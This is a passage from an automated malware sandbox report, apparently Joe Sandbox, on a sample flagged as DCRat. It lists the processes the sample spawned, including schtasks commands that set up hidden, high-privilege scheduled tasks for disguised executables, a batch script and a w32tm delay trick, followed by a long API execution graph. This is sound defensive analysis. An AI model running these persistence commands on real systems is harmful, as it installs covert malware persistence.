                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Has exited:true

                    General

                    Target ID:27
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:28
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:29
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:30
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:31
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:32
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:33
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:34
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:35
                    Start time:20:20:05
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:36
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:37
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:38
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
                    Imagebase:0x7ff7d0a70000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:39
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"
                    Imagebase:0x7ff69f860000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:40
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:41
                    Start time:20:20:06
                    Start date:22/11/2024
                    Path:C:\Windows\System32\w32tm.exe
                    Wow64 process (32bit):false
                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Imagebase:0x7ff78fcb0000
                    File size:108'032 bytes
                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:9.8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.3%
                      Total number of Nodes:1510
                      Total number of Limit Nodes:37
                      execution_graph 22904 d610d5 22909 d65bd7 22904->22909 22910 d65be1 __EH_prolog 22909->22910 22918 d6b07d 22910->22918 22912 d65bed 22924 d65dcc GetCurrentProcess GetProcessAffinityMask 22912->22924 22919 d6b087 __EH_prolog 22918->22919 22925 d6ea80 80 API calls 22919->22925 22921 d6b099 22926 d6b195 22921->22926 22925->22921 22927 d6b1a7 ___scrt_get_show_window_mode 22926->22927 22930 d70948 22927->22930 22933 d70908 GetCurrentProcess GetProcessAffinityMask 22930->22933 22934 d6b10f 22933->22934 22934->22912 22944 d7ead2 22945 d7eade CallCatchBlock 22944->22945 22970 d7e5c7 22945->22970 22947 d7eae5 22949 d7eb0e 22947->22949 23050 d7ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22947->23050 22958 d7eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22949->22958 22981 d8824d 22949->22981 22953 d7eb2d CallCatchBlock 22954 d7ebad 22989 d7f020 22954->22989 22958->22954 23051 d87243 38 API calls 3 library calls 22958->23051 22965 d7ebd9 22967 d7ebe2 22965->22967 23052 d8764a 28 API calls _abort 22965->23052 23053 d7e73e 13 API calls 2 library calls 22967->23053 22971 d7e5d0 22970->22971 23054 d7ed5b IsProcessorFeaturePresent 22971->23054 22973 d7e5dc 23055 d82016 22973->23055 22975 d7e5e1 22976 d7e5e5 22975->22976 23064 d880d7 22975->23064 22976->22947 22979 d7e5fc 22979->22947 22984 d88264 22981->22984 22982 d7ec4a CatchGuardHandler 5 API calls 22983 d7eb27 22982->22983 22983->22953 22985 d881f1 22983->22985 22984->22982 22986 d88220 22985->22986 22987 d7ec4a CatchGuardHandler 5 API calls 22986->22987 22988 d88249 22987->22988 22988->22958 23122 d7f350 22989->23122 22992 d7ebb3 22993 d8819e 22992->22993 23124 d8b290 22993->23124 22995 d881a7 22996 d7ebbc 22995->22996 23128 d8b59a 38 API calls 22995->23128 22998 d7d5d4 22996->22998 23315 d700cf 22998->23315 23002 d7d5f3 23364 d7a335 23002->23364 23004 d7d5fc 23368 d713b3 GetCPInfo 23004->23368 23006 d7d606 ___scrt_get_show_window_mode 23007 d7d619 GetCommandLineW 23006->23007 23008 d7d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23007->23008 23009 d7d628 23007->23009 23382 d6400a 23008->23382 23371 d7bc84 23009->23371 23015 d7d636 OpenFileMappingW 23018 d7d696 CloseHandle 23015->23018 23019 d7d64f MapViewOfFile 23015->23019 23016 d7d6a0 23376 d7d287 23016->23376 23018->23008 23022 d7d660 __vswprintf_c_l 23019->23022 23023 d7d68d UnmapViewOfFile 23019->23023 23027 d7d287 2 API calls 23022->23027 23023->23018 23029 d7d67c 23027->23029 23028 d78835 8 API calls 23030 d7d76a DialogBoxParamW 23028->23030 23029->23023 23031 d7d7a4 23030->23031 23032 d7d7b6 Sleep 23031->23032 23033 d7d7bd 23031->23033 23032->23033 23035 d7d7cb 23033->23035 23415 d7a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23033->23415 23036 d7d7ea DeleteObject 23035->23036 23037 d7d7ff DeleteObject 23036->23037 23040 d7d806 23036->23040 23037->23040 23038 d7d837 23416 d7d2e6 6 API calls 23038->23416 23039 d7d849 23412 d7a39d 23039->23412 23040->23038 23040->23039 23043 d7d83d CloseHandle 23043->23039 23044 d7d883 23045 d8757e GetModuleHandleW 23044->23045 23046 d7ebcf 23045->23046 23046->22965 23047 d876a7 23046->23047 23669 d87424 23047->23669 23050->22947 23051->22954 23052->22967 23053->22953 23054->22973 23056 d8201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23055->23056 23068 d8310e 23056->23068 23060 d82031 23061 d8203c 23060->23061 23082 d8314a DeleteCriticalSection 23060->23082 23061->22975 23063 d82029 23063->22975 23110 d8b73a 23064->23110 23067 d8203f 8 API calls 3 library calls 23067->22976 23069 d83117 23068->23069 23071 d83140 23069->23071 23072 d82025 23069->23072 23083 d83385 23069->23083 23088 d8314a DeleteCriticalSection 23071->23088 23072->23063 23074 d8215c 23072->23074 23103 d8329a 23074->23103 23076 d82166 23081 d82171 23076->23081 23108 d83348 6 API calls try_get_function 23076->23108 23078 d8217f 23079 d8218c 23078->23079 23109 d8218f 6 API calls ___vcrt_FlsFree 23078->23109 23079->23060 23081->23060 23082->23063 23089 d83179 23083->23089 23086 d833bc InitializeCriticalSectionAndSpinCount 23087 d833a8 23086->23087 23087->23069 23088->23072 23090 d831a9 23089->23090 23091 d831ad 23089->23091 23090->23091 23095 d831cd 23090->23095 23096 d83219 23090->23096 23091->23086 23091->23087 23093 d831d9 GetProcAddress 23094 d831e9 __crt_fast_encode_pointer 23093->23094 23094->23091 23095->23091 23095->23093 23097 d83241 LoadLibraryExW 23096->23097 23098 d83236 23096->23098 23099 d8325d GetLastError 23097->23099 23100 d83275 23097->23100 23098->23090 23099->23100 23101 d83268 LoadLibraryExW 23099->23101 23100->23098 23102 d8328c FreeLibrary 23100->23102 23101->23100 23102->23098 23104 d83179 try_get_function 5 API calls 23103->23104 23105 d832b4 23104->23105 23106 d832cc TlsAlloc 23105->23106 23107 d832bd 23105->23107 23107->23076 23108->23078 23109->23081 23113 d8b753 23110->23113 23112 d7e5ee 23112->22979 23112->23067 23114 d7ec4a 23113->23114 23115 d7ec55 IsProcessorFeaturePresent 23114->23115 23116 d7ec53 23114->23116 23118 d7f267 23115->23118 23116->23112 23121 d7f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23118->23121 23120 d7f34a 23120->23112 23121->23120 23123 d7f033 GetStartupInfoW 23122->23123 23123->22992 23125 d8b299 23124->23125 23127 d8b2a2 23124->23127 23129 d8b188 23125->23129 23127->22995 23128->22995 23149 d88fa5 GetLastError 23129->23149 23131 d8b195 23170 d8b2ae 23131->23170 23133 d8b19d 23179 d8af1b 23133->23179 23136 d8b1b4 23136->23127 23139 d8b1f7 23204 d884de 23139->23204 23143 d8b1f2 23203 d8895a 20 API calls _abort 23143->23203 23145 d8b23b 23145->23139 23210 d8adf1 26 API calls 23145->23210 23146 d8b20f 23146->23145 23147 d884de _free 20 API calls 23146->23147 23147->23145 23150 d88fbb 23149->23150 23151 d88fc7 23149->23151 23211 d8a61b 11 API calls 2 library calls 23150->23211 23212 d885a9 20 API calls 3 library calls 23151->23212 23154 d88fc1 23154->23151 23156 d89010 SetLastError 23154->23156 23155 d88fd3 23157 d88fdb 23155->23157 23213 d8a671 11 API calls 2 library calls 23155->23213 23156->23131 23159 d884de _free 20 API calls 23157->23159 23161 d88fe1 23159->23161 23160 d88ff0 23160->23157 23162 d88ff7 23160->23162 23163 d8901c SetLastError 23161->23163 23214 d88e16 20 API calls CallUnexpected 23162->23214 23215 d88566 38 API calls _abort 23163->23215 23166 d89002 23167 d884de _free 20 API calls 23166->23167 23169 d89009 23167->23169 23169->23156 23169->23163 23171 d8b2ba CallCatchBlock 23170->23171 23172 d88fa5 CallUnexpected 38 API calls 23171->23172 23174 d8b2c4 23172->23174 23177 d8b348 CallCatchBlock 23174->23177 23178 d884de _free 20 API calls 23174->23178 23216 d88566 38 API calls _abort 23174->23216 23217 d8a3f1 EnterCriticalSection 23174->23217 23218 d8b33f LeaveCriticalSection _abort 23174->23218 23177->23133 23178->23174 23219 d83dd6 23179->23219 23182 d8af3c GetOEMCP 23184 d8af65 23182->23184 23183 d8af4e 23183->23184 23185 d8af53 GetACP 23183->23185 23184->23136 23186 d88518 23184->23186 23185->23184 23187 d88556 23186->23187 23191 d88526 CallUnexpected 23186->23191 23230 d8895a 20 API calls _abort 23187->23230 23188 d88541 RtlAllocateHeap 23190 d88554 23188->23190 23188->23191 23190->23139 23193 d8b350 23190->23193 23191->23187 23191->23188 23229 d871ad 7 API calls 2 library calls 23191->23229 23194 d8af1b 40 API calls 23193->23194 23196 d8b36f 23194->23196 23195 d8b376 23198 d7ec4a CatchGuardHandler 5 API calls 23195->23198 23196->23195 23197 d8b3e5 ___scrt_get_show_window_mode 23196->23197 23200 d8b3c0 IsValidCodePage 23196->23200 23231 d8aff4 GetCPInfo 23197->23231 23199 d8b1ea 23198->23199 23199->23143 23199->23146 23200->23195 23201 d8b3d2 GetCPInfo 23200->23201 23201->23195 23201->23197 23203->23139 23205 d884e9 RtlFreeHeap 23204->23205 23206 d88512 _free 23204->23206 23205->23206 23207 d884fe 23205->23207 23206->23136 23314 d8895a 20 API calls _abort 23207->23314 23209 d88504 GetLastError 23209->23206 23210->23139 23211->23154 23212->23155 23213->23160 23214->23166 23217->23174 23218->23174 23220 d83df3 23219->23220 23221 d83de9 23219->23221 23220->23221 23222 d88fa5 CallUnexpected 38 API calls 23220->23222 23221->23182 23221->23183 23223 d83e14 23222->23223 23227 d890fa 38 API calls __cftof 23223->23227 23225 d83e2d 23228 d89127 38 API calls __cftof 23225->23228 23227->23225 23228->23221 23229->23191 23230->23190 23235 d8b02e 23231->23235 23240 d8b0d8 23231->23240 23234 d7ec4a CatchGuardHandler 5 API calls 23237 d8b184 23234->23237 23241 d8c099 23235->23241 23237->23195 23239 d8a275 __vsnwprintf_l 43 API calls 23239->23240 23240->23234 23242 d83dd6 __cftof 38 API calls 23241->23242 23243 d8c0b9 MultiByteToWideChar 23242->23243 23245 d8c18f 23243->23245 23246 d8c0f7 23243->23246 23247 d7ec4a CatchGuardHandler 5 API calls 23245->23247 23248 d88518 __vsnwprintf_l 21 API calls 23246->23248 23251 d8c118 __vsnwprintf_l ___scrt_get_show_window_mode 23246->23251 23249 d8b08f 23247->23249 23248->23251 23255 d8a275 23249->23255 23250 d8c189 23260 d8a2c0 20 API calls _free 23250->23260 23251->23250 23253 d8c15d MultiByteToWideChar 23251->23253 23253->23250 23254 d8c179 GetStringTypeW 23253->23254 23254->23250 23256 d83dd6 __cftof 38 API calls 23255->23256 23257 d8a288 23256->23257 23261 d8a058 23257->23261 23260->23245 23263 d8a073 __vsnwprintf_l 23261->23263 23262 d8a099 MultiByteToWideChar 23264 d8a24d 23262->23264 23265 d8a0c3 23262->23265 23263->23262 23266 d7ec4a CatchGuardHandler 5 API calls 23264->23266 23268 d88518 __vsnwprintf_l 21 API calls 23265->23268 23271 d8a0e4 __vsnwprintf_l 23265->23271 23267 d8a260 23266->23267 23267->23239 23268->23271 23269 d8a12d MultiByteToWideChar 23270 d8a199 23269->23270 23272 d8a146 23269->23272 23297 d8a2c0 20 API calls _free 23270->23297 23271->23269 23271->23270 23288 d8a72c 23272->23288 23276 d8a1a8 23280 d88518 __vsnwprintf_l 21 API calls 23276->23280 23283 d8a1c9 __vsnwprintf_l 23276->23283 23277 d8a170 23277->23270 23278 d8a72c __vsnwprintf_l 11 API calls 23277->23278 23278->23270 23279 d8a23e 23296 d8a2c0 20 API calls _free 23279->23296 23280->23283 23281 d8a72c __vsnwprintf_l 11 API calls 23284 d8a21d 23281->23284 23283->23279 23283->23281 23284->23279 23285 d8a22c WideCharToMultiByte 23284->23285 23285->23279 23286 d8a26c 23285->23286 23298 d8a2c0 20 API calls _free 23286->23298 23299 d8a458 23288->23299 23292 d8a79c LCMapStringW 23293 d8a75c 23292->23293 23294 d7ec4a CatchGuardHandler 5 API calls 23293->23294 23295 d8a15d 23294->23295 23295->23270 23295->23276 23295->23277 23296->23270 23297->23264 23298->23270 23300 d8a484 23299->23300 23301 d8a488 23299->23301 23300->23301 23305 d8a4a8 23300->23305 23307 d8a4f4 23300->23307 23301->23293 23306 d8a7b4 10 API calls 3 library calls 23301->23306 23303 d8a4b4 GetProcAddress 23304 d8a4c4 __crt_fast_encode_pointer 23303->23304 23304->23301 23305->23301 23305->23303 23306->23292 23308 d8a50a 23307->23308 23309 d8a515 LoadLibraryExW 23307->23309 23308->23300 23310 d8a532 GetLastError 23309->23310 23311 d8a54a 23309->23311 23310->23311 23312 d8a53d LoadLibraryExW 23310->23312 23311->23308 23313 d8a561 FreeLibrary 23311->23313 23312->23311 23313->23308 23314->23209 23417 d7e360 23315->23417 23318 d70154 23320 d70484 GetModuleFileNameW 23318->23320 23428 d870dd 42 API calls 2 library calls 23318->23428 23319 d700f0 GetProcAddress 23321 d70121 GetProcAddress 23319->23321 23322 d70109 23319->23322 23333 d704a3 23320->23333 23321->23318 23323 d70133 23321->23323 23322->23321 23323->23318 23325 d703be 23325->23320 23326 d703c9 GetModuleFileNameW CreateFileW 23325->23326 23327 d703fc SetFilePointer 23326->23327 23328 d70478 CloseHandle 23326->23328 23327->23328 23329 d7040c ReadFile 23327->23329 23328->23320 23329->23328 23331 d7042b 23329->23331 23331->23328 23335 d70085 2 API calls 23331->23335 23334 d704d2 CompareStringW 23333->23334 23336 d70508 GetFileAttributesW 23333->23336 23337 d70520 23333->23337 23419 d6acf5 23333->23419 23422 d70085 23333->23422 23334->23333 23335->23331 23336->23333 23336->23337 23338 d7052a 23337->23338 23340 d70560 23337->23340 23341 d70542 GetFileAttributesW 23338->23341 23343 d7055a 23338->23343 23339 d7066f 23363 d79da4 GetCurrentDirectoryW 23339->23363 23340->23339 23342 d6acf5 GetVersionExW 23340->23342 23341->23338 23341->23343 23344 d7057a 23342->23344 23343->23340 23345 d705e7 23344->23345 23346 d70581 23344->23346 23347 d6400a _swprintf 51 API calls 23345->23347 23348 d70085 2 API calls 23346->23348 23349 d7060f AllocConsole 23347->23349 23350 d7058b 23348->23350 23351 d70667 ExitProcess 23349->23351 23352 d7061c GetCurrentProcessId AttachConsole 23349->23352 23353 d70085 2 API calls 23350->23353 23432 d835b3 23352->23432 23355 d70595 23353->23355 23429 d6ddd1 23355->23429 23356 d7063d GetStdHandle WriteConsoleW Sleep FreeConsole 23356->23351 23359 d6400a _swprintf 51 API calls 23360 d705c3 23359->23360 23361 d6ddd1 53 API calls 23360->23361 23362 d705d2 23361->23362 23362->23351 23363->23002 23365 d70085 2 API calls 23364->23365 23366 d7a349 OleInitialize 23365->23366 23367 d7a36c GdiplusStartup SHGetMalloc 23366->23367 23367->23004 23369 d713d7 IsDBCSLeadByte 23368->23369 23369->23369 23370 d713ef 23369->23370 23370->23006 23375 d7bc8e 23371->23375 23372 d7bda4 23372->23015 23372->23016 23373 d7179d CharUpperW 23373->23375 23375->23372 23375->23373 23457 d6ecad 80 API calls ___scrt_get_show_window_mode 23375->23457 23377 d7e360 23376->23377 23378 d7d294 SetEnvironmentVariableW 23377->23378 23380 d7d2b7 23378->23380 23379 d7d2df 23379->23008 23380->23379 23381 d7d2d3 SetEnvironmentVariableW 23380->23381 23381->23379 23458 d63fdd 23382->23458 23385 d7aded LoadBitmapW 23386 d7ae15 23385->23386 23387 d7ae0e 23385->23387 23389 d7ae1b GetObjectW 23386->23389 23390 d7ae2a 23386->23390 23492 d79e1c FindResourceW 23387->23492 23389->23390 23487 d79d1a 23390->23487 23393 d7ae80 23404 d6d31c 23393->23404 23394 d7ae5c 23508 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23394->23508 23395 d79e1c 13 API calls 23398 d7ae4d 23395->23398 23397 d7ae64 23509 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23397->23509 23398->23394 23400 d7ae53 DeleteObject 23398->23400 23400->23394 23401 d7ae6d 23510 d79f5d 8 API calls ___scrt_get_show_window_mode 23401->23510 23403 d7ae74 DeleteObject 23403->23393 23521 d6d341 23404->23521 23406 d6d328 23561 d6da4e GetModuleHandleW FindResourceW 23406->23561 23409 d78835 23660 d7e24a 23409->23660 23413 d7a3cc GdiplusShutdown CoUninitialize 23412->23413 23413->23044 23415->23035 23416->23043 23418 d700d9 GetModuleHandleW 23417->23418 23418->23318 23418->23319 23420 d6ad09 GetVersionExW 23419->23420 23421 d6ad45 23419->23421 23420->23421 23421->23333 23423 d7e360 23422->23423 23424 d70092 GetSystemDirectoryW 23423->23424 23425 d700aa 23424->23425 23426 d700c8 23424->23426 23427 d700bb LoadLibraryW 23425->23427 23426->23333 23427->23426 23428->23325 23434 d6ddff 23429->23434 23433 d835bb 23432->23433 23433->23356 23433->23433 23440 d6d28a 23434->23440 23437 d6de22 LoadStringW 23438 d6ddfc 23437->23438 23439 d6de39 LoadStringW 23437->23439 23438->23359 23439->23438 23445 d6d1c3 23440->23445 23442 d6d2a7 23443 d6d2bc 23442->23443 23453 d6d2c8 26 API calls 23442->23453 23443->23437 23443->23438 23446 d6d1de 23445->23446 23452 d6d1d7 _strncpy 23445->23452 23448 d6d202 23446->23448 23454 d71596 WideCharToMultiByte 23446->23454 23451 d6d233 23448->23451 23455 d6dd6b 50 API calls __vsnprintf 23448->23455 23456 d858d9 26 API calls 3 library calls 23451->23456 23452->23442 23453->23443 23454->23448 23455->23451 23456->23452 23457->23375 23459 d63ff4 __vswprintf_c_l 23458->23459 23462 d85759 23459->23462 23465 d83837 23462->23465 23466 d8385f 23465->23466 23467 d83877 23465->23467 23482 d8895a 20 API calls _abort 23466->23482 23467->23466 23469 d8387f 23467->23469 23471 d83dd6 __cftof 38 API calls 23469->23471 23470 d83864 23483 d88839 26 API calls pre_c_initialization 23470->23483 23473 d8388f 23471->23473 23484 d83da1 20 API calls 2 library calls 23473->23484 23475 d7ec4a CatchGuardHandler 5 API calls 23477 d63ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23475->23477 23476 d83907 23485 d84186 51 API calls 4 library calls 23476->23485 23477->23385 23480 d8386f 23480->23475 23481 d83912 23486 d83e59 20 API calls _free 23481->23486 23482->23470 23483->23480 23484->23476 23485->23481 23486->23480 23511 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23487->23511 23489 d79d21 23490 d79d2d 23489->23490 23512 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23489->23512 23490->23393 23490->23394 23490->23395 23493 d79e70 23492->23493 23494 d79e3e SizeofResource 23492->23494 23493->23386 23494->23493 23495 d79e52 LoadResource 23494->23495 23495->23493 23496 d79e63 LockResource 23495->23496 23496->23493 23497 d79e77 GlobalAlloc 23496->23497 23497->23493 23498 d79e92 GlobalLock 23497->23498 23499 d79f21 GlobalFree 23498->23499 23500 d79ea1 __vswprintf_c_l 23498->23500 23499->23493 23501 d79ea9 CreateStreamOnHGlobal 23500->23501 23502 d79ec1 23501->23502 23503 d79f1a GlobalUnlock 23501->23503 23513 d79d7b GdipAlloc 23502->23513 23503->23499 23506 d79eef GdipCreateHBITMAPFromBitmap 23507 d79f05 23506->23507 23507->23503 23508->23397 23509->23401 23510->23403 23511->23489 23512->23490 23514 d79d8d 23513->23514 23515 d79d9a 23513->23515 23517 d79b0f 23514->23517 23515->23503 23515->23506 23515->23507 23518 d79b37 GdipCreateBitmapFromStream 23517->23518 23519 d79b30 GdipCreateBitmapFromStreamICM 23517->23519 23520 d79b3c 23518->23520 23519->23520 23520->23515 23522 d6d34b _wcschr __EH_prolog 23521->23522 23523 d6d37a GetModuleFileNameW 23522->23523 23524 d6d3ab 23522->23524 23525 d6d394 23523->23525 23563 d699b0 23524->23563 23525->23524 23528 d6d407 23574 d85a90 26 API calls 3 library calls 23528->23574 23531 d6d3db 23531->23528 23534 d73781 76 API calls 23531->23534 23545 d6d627 23531->23545 23532 d6d41a 23575 d85a90 26 API calls 3 library calls 23532->23575 23534->23531 23535 d6d563 23535->23545 23600 d69d30 77 API calls 23535->23600 23539 d6d57d new 23540 d69bf0 80 API calls 23539->23540 23539->23545 23543 d6d5a6 new 23540->23543 23542 d6d42c 23542->23535 23542->23545 23576 d69e40 23542->23576 23591 d69bf0 23542->23591 23599 d69d30 77 API calls 23542->23599 23543->23545 23558 d6d5b2 new 23543->23558 23601 d7137a MultiByteToWideChar 23543->23601 23584 d69653 23545->23584 23546 d6d72b 23602 d6ce72 76 API calls 23546->23602 23548 d6da0a 23607 d6ce72 76 API calls 23548->23607 23550 d6d9fa 23550->23406 23551 d6d771 23603 d85a90 26 API calls 3 library calls 23551->23603 23553 d73781 76 API calls 23555 d6d742 23553->23555 23554 d6d78b 23604 d85a90 26 API calls 3 library calls 23554->23604 23555->23551 23555->23553 23557 d71596 WideCharToMultiByte 23557->23558 23558->23545 23558->23546 23558->23548 23558->23550 23558->23557 23605 d6dd6b 50 API calls __vsnprintf 23558->23605 23606 d858d9 26 API calls 3 library calls 23558->23606 23562 d6d32f 23561->23562 23562->23409 23564 d699ba 23563->23564 23565 d69a39 CreateFileW 23564->23565 23566 d69aaa 23565->23566 23567 d69a59 GetLastError 23565->23567 23569 d69ae1 23566->23569 23571 d69ac7 SetFileTime 23566->23571 23608 d6b66c 23567->23608 23569->23531 23570 d69a79 23570->23566 23572 d69a7d CreateFileW GetLastError 23570->23572 23571->23569 23573 d69aa1 23572->23573 23573->23566 23574->23532 23575->23542 23577 d69e64 SetFilePointer 23576->23577 23578 d69e53 23576->23578 23579 d69e82 GetLastError 23577->23579 23580 d69e9d 